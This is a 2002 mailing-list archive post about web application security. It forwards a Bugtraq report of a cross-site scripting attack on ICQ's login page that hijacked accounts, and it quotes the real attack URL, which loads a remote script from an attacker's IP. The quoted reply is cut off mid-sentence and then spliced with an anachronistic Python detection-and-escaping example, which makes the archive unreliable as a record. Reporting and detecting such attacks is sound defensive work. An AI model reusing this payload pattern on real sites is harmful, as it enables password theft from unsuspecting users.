
Re: Top Ten Web App Sec Problems

From: Alex Lambert <alambert(at)webmaster.com>
Date: Mon Dec 02 2002 - 19:44:24 EST

Here's one from incidents/bugtraq today:

From: "Rafael Coninck Teigao" <rafael@SafeCore.NET>
To: "SecurityFocus - Bugtraq" <bugtraq@securityfocus.com>; "Security Focus' INCIDENTS" <INCIDENTS@securityfocus.com>
Sent: Monday, December 02, 2002 10:29 AM
Subject: [Fwd: XSS on ICQ leading to password compromise]

> Moderator:
> I've sent the following email to bugtraq last week. Haven't seen it on
> the list, but it came to my attention that even more accounts were
> hijacked this way.
> I'm also sending this to incidents, because I think that maybe some
> administrators are receiving similar complaints from their users and
> could (perhaps) block the XSS pages somehow.
>
> -------- Original Message --------
> From: Rafael Coninck Teigao <rafael@SafeCore.NET>
> Subject: XSS on ICQ leading to password compromise
> To: SecurityFocus - Bugtraq <bugtraq@securityfocus.com>
> CC: horvath@avalon.sul.com.br, ahi@TELEFONICAEMPRESAS.NET.BR,nbso@nic.br
>
> Hello, pp.
> I've tried to find some representative from the ICQ technical staff
> but had no success so far.
> Anyway, here's what's happening:
> A friend of mine got the following address on his ICQ from a friend
> on his contact list:
>
> http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=<s cript%20src="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E </script%3e
>
> we can clearly see the <script... part on it. Unfortunately, he
> couldn't.
> When the page opened, he typed his email address and password. Five
> minutes later he was disconnected from ICQ and was unable to login
> again.
> He then tried to recover his password and saw that it was set to:
> aaaaa
> a
> that's right, it has a new line on it.
> The source on the script is:
> http://200.158.50.245/web/icq.asa
> That IP address comes from an ADSL from Telesp. The date and time of
> the incident were Nov/24 at 20:12 (GMT -2).
>
> He also told me that the friend who sent him the address and another
> person had their accounts hijacked as well.
>
> Best regards,
> Rafael Coninck Teigao
> SafeCore Network Solutions
> http://SafeCore.NET
> +55 41 224 1785
>
> --

*snipped footers*

apl

----- Original Message -----
From: "Kevin Spett" <kspett@spidynamics.com>
To: "Richard M. Smith" <rms@computerbytesman.com>; <webappsec@securityfocus.com>
Sent: Monday, December 02, 2002 5:28 PM
Subject: Re: Top Ten Web App Sec Problems

> There have been a number of publicized Hotmail problems that were being
a
> window saying "Oh, I'm sorry you'll have to log in again" or something.
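Added example (not code from the thread or from ICQ): the ICQ URL reflects the karma_err_msg parameter into the login page unescaped, and the injected script source is hidden behind percent-encoding. The code below does what a proxy or web-server administrator could do to spot such links (fully percent-decode each query parameter before looking for script markup) and what the login page should have done (escape the reflected message). The sample URL is constructed after the reported one; 203.0.113.5 is a documentation address, not the address from the report.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Markup that executes if a parameter value is reflected unescaped into HTML:
# a script tag, an event-handler attribute inside a tag, or a javascript: URL.
_SCRIPT_RE = re.compile(
    r"<\s*script\b|<\s*\w+[^>]*\bon\w+\s*=|javascript\s*:", re.IGNORECASE
)


def decode_fully(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing, so %253C (a double-encoded
    '<') and %68%74%74%70 ('http') are both exposed to the pattern check."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_script_injection(url: str) -> list[tuple[str, str]]:
    """Return (parameter name, decoded value) pairs whose value carries script
    markup. parse_qsl already decodes one layer; decode_fully handles the rest."""
    query = urlsplit(url).query
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        decoded = decode_fully(raw)
        if _SCRIPT_RE.search(decoded):
            hits.append((name, decoded))
    return hits


def render_error_safely(msg: str) -> str:
    """The fix on the application side: HTML-escape the reflected error message
    (quote=True also escapes quotes, so it is safe inside attributes)."""
    return '<div class="error">%s</div>' % html.escape(msg, quote=True)


# Constructed sample modelled on the reported link (documentation IP, not the real one).
SAMPLE_URL = (
    "http://web.icq.com/login/login_page/1,,err_sys_busy,00.html"
    '?karma_err_msg=<script%20src="%68%74%74%70%3A%2F%2F203%2E0%2E113%2E5'
    '%2Fweb%2Ficq%2Easa"%3E</script%3e'
)

if __name__ == "__main__":
    for name, value in find_script_injection(SAMPLE_URL):
        print("suspicious parameter %s: %s" % (name, value))
    print(render_error_safely("System busy, <try again>"))
```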
Received on Mon Dec 2 19:47:45 2002

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:45 EDT

